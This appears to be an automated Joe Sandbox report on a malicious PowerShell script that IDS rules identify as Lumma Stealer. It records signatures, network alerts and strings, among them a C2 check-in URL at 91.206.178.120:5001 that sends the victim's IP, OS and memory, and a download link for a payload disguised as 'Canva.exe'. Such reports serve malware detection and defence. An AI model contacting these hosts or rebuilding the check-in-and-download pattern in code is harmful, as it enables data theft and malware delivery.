Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Pmw24ExIdx.ps1

Overview

General Information

Sample name:Pmw24ExIdx.ps1
renamed because original name is a hash value
Original sample name:6b61934dea7d3b16f46b12dc810972a58e4278632ad39abdbf79801fca7a4875.ps1
Analysis ID:1617745
MD5:9d4b0d4215aba4d887790a8a959eb119
SHA1:7a2607ff3d039b73a913381daf2df94c58e67a61
SHA256:6b61934dea7d3b16f46b12dc810972a58e4278632ad39abdbf79801fca7a4875
Tags:91-206-178-120ps1user-JAMESWT_MHT
Infos:

Detection

Score:76
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Uses known network protocols on non-standard ports
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7236 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Pmw24ExIdx.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • notepad.exe (PID: 7424 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\Pmw24ExIdx.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Pmw24ExIdx.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Pmw24ExIdx.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5808, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Pmw24ExIdx.ps1", ProcessId: 7236, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Pmw24ExIdx.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Pmw24ExIdx.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5808, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Pmw24ExIdx.ps1", ProcessId: 7236, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-18T08:26:01.893635+010020216971A Network Trojan was detected192.168.2.749701185.211.7.193443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-18T08:26:03.061005+010028032742Potentially Bad Traffic192.168.2.74970591.206.178.1205001TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-18T08:26:00.782059+010028602321Malware Command and Control Activity Detected192.168.2.74970091.206.178.1205001TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-18T08:26:00.782066+010028602331Malware Command and Control Activity Detected91.206.178.1205001192.168.2.749700TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-18T08:25:58.366209+010018100002Potentially Bad Traffic192.168.2.749699104.26.12.20580TCP
2025-02-18T08:26:00.782059+010018100002Potentially Bad Traffic192.168.2.74970091.206.178.1205001TCP
2025-02-18T08:26:01.893635+010018100002Potentially Bad Traffic192.168.2.749701185.211.7.193443TCP
2025-02-18T08:26:03.061005+010018100002Potentially Bad Traffic192.168.2.74970591.206.178.1205001TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://91.206.178.120:5001/script_end?random_number=Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number=$randomNumberAvira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number=66350$MAvira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$raAvira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number=66350Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=MicrosoftAvira URL Cloud: Label: malware
Source: https://goutteuy.com/wp-content/plugins/header-footer/images/Canva.exeAvira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001Avira URL Cloud: Label: malware
Source: https://goutteuy.com/wp-content/pAvira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=66350Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&mAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: Pmw24ExIdx.ps1Virustotal: Detection: 14%Perma Link
Joe Sandbox ML detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.5% probability
Source: unknownHTTPS traffic detected: 185.211.7.193:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.18.11.207:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1353705363.0000000008830000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2860232 - Severity 1 - ETPRO MALWARE Observed Lumma Stealer CnC Checkin (GET) : 192.168.2.7:49700 -> 91.206.178.120:5001
Source: Network trafficSuricata IDS: 2860233 - Severity 1 - ETPRO MALWARE Observed Lumma Stealer CnC Response (Script Start Confirmation) : 91.206.178.120:5001 -> 192.168.2.7:49700
Source: Network trafficSuricata IDS: 2021697 - Severity 1 - ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious : 192.168.2.7:49701 -> 185.211.7.193:443
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 5001
Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 5001
Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49705
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 91.206.178.120:5001
Source: global trafficTCP traffic: 192.168.2.7:57642 -> 162.159.36.2:53
Source: Joe Sandbox ViewIP Address: 104.18.11.207 104.18.11.207
Source: Joe Sandbox ViewIP Address: 104.18.11.207 104.18.11.207
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewASN Name: QUICKPACKETUS QUICKPACKETUS
Source: Joe Sandbox ViewASN Name: ARTNET2PL ARTNET2PL
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49699 -> 104.26.12.205:80
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49700 -> 91.206.178.120:5001
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49705 -> 91.206.178.120:5001
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49705 -> 91.206.178.120:5001
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49701 -> 185.211.7.193:443
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/header-footer/images/Canva.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: goutteuy.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /bootstrap/3.3.7/css/bootstrap.min.css HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: maxcdn.bootstrapcdn.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=66350 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /script_end?random_number=66350 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/header-footer/images/Canva.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: goutteuy.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /bootstrap/3.3.7/css/bootstrap.min.css HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: maxcdn.bootstrapcdn.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=66350 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /script_end?random_number=66350 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: goutteuy.com
Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Fri, 07 Jan 2022 09:51:35 GMTetag: "999-61d80d27-4ab5739bf7ac3281;;;"accept-ranges: bytescontent-length: 2457date: Tue, 18 Feb 2025 07:26:01 GMTserver: LiteSpeedcontent-security-policy: upgrade-insecure-requestsplatform: hostingerpanel: hpanelalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: powershell.exe, 00000000.00000002.1346667806.00000000057B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1346667806.000000000563E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001
Source: powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_end?random_number=
Source: powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2501344002.0000020D591B5000.00000004.00000020.00020000.00000000.sdmp, Pmw24ExIdx.ps1String found in binary or memory: http://91.206.178.120:5001/script_end?random_number=$randomNumber
Source: powershell.exe, 00000000.00000002.1346667806.00000000057B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_end?random_number=66350
Source: powershell.exe, 00000000.00000002.1346667806.00000000057B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1346667806.00000000056B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_end?random_number=66350$M
Source: powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_start?ip=
Source: powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2501141841.000000FCA7A99000.00000004.00000010.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2501344002.0000020D591B5000.00000004.00000020.00020000.00000000.sdmp, Pmw24ExIdx.ps1String found in binary or memory: http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra
Source: powershell.exe, 00000000.00000002.1346667806.000000000563E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft
Source: powershell.exe, 00000000.00000002.1346667806.000000000563E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m
Source: powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2501141841.000000FCA7A99000.00000004.00000010.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2501344002.0000020D591B5000.00000004.00000020.00020000.00000000.sdmp, Pmw24ExIdx.ps1String found in binary or memory: http://api.ipify.org
Source: powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
Source: powershell.exe, 00000000.00000002.1349234959.000000000646B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1346667806.0000000005401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1354012806.000000000890D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000000.00000002.1346667806.0000000005401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000000.00000002.1349234959.000000000646B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1349234959.000000000646B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1349234959.000000000646B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1354012806.000000000890D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/
Source: powershell.exe, 00000000.00000002.1354012806.000000000890D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/c
Source: powershell.exe, 00000000.00000002.1345826883.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1346667806.00000000056AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1346667806.0000000005C05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1346667806.0000000005697000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goutteuy.com
Source: powershell.exe, 00000000.00000002.1346667806.00000000057B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1346667806.00000000056B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goutteuy.com/wp-content/p
Source: powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2501344002.0000020D591B5000.00000004.00000020.00020000.00000000.sdmp, Pmw24ExIdx.ps1String found in binary or memory: https://goutteuy.com/wp-content/plugins/header-footer/images/Canva.exe
Source: powershell.exe, 00000000.00000002.1354012806.00000000088B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/
Source: powershell.exe, 00000000.00000002.1354012806.00000000088B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/)
Source: powershell.exe, 00000000.00000002.1354012806.000000000890D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1346667806.00000000056AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
Source: powershell.exe, 00000000.00000002.1354012806.000000000890D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css.
Source: powershell.exe, 00000000.00000002.1349234959.000000000646B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1354012806.00000000088B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/
Source: powershell.exe, 00000000.00000002.1354012806.00000000088B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/?%
Source: powershell.exe, 00000000.00000002.1354012806.000000000890D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1346667806.00000000056AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
Source: powershell.exe, 00000000.00000002.1354498609.000000000895B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js1
Source: powershell.exe, 00000000.00000002.1354498609.000000000895B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.jsC
Source: powershell.exe, 00000000.00000002.1354498609.000000000895B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.jsh
Source: powershell.exe, 00000000.00000002.1354012806.000000000890D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js~
Source: powershell.exe, 00000000.00000002.1354012806.00000000088B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/c%Q
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownHTTPS traffic detected: 185.211.7.193:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.18.11.207:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0530E4D80_2_0530E4D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0A3379900_2_0A337990
Source: classification engineClassification label: mal76.troj.winPS1@3/7@4/4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7244:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbtwnioc.hez.ps1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: Pmw24ExIdx.ps1Virustotal: Detection: 14%
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Pmw24ExIdx.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\Pmw24ExIdx.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
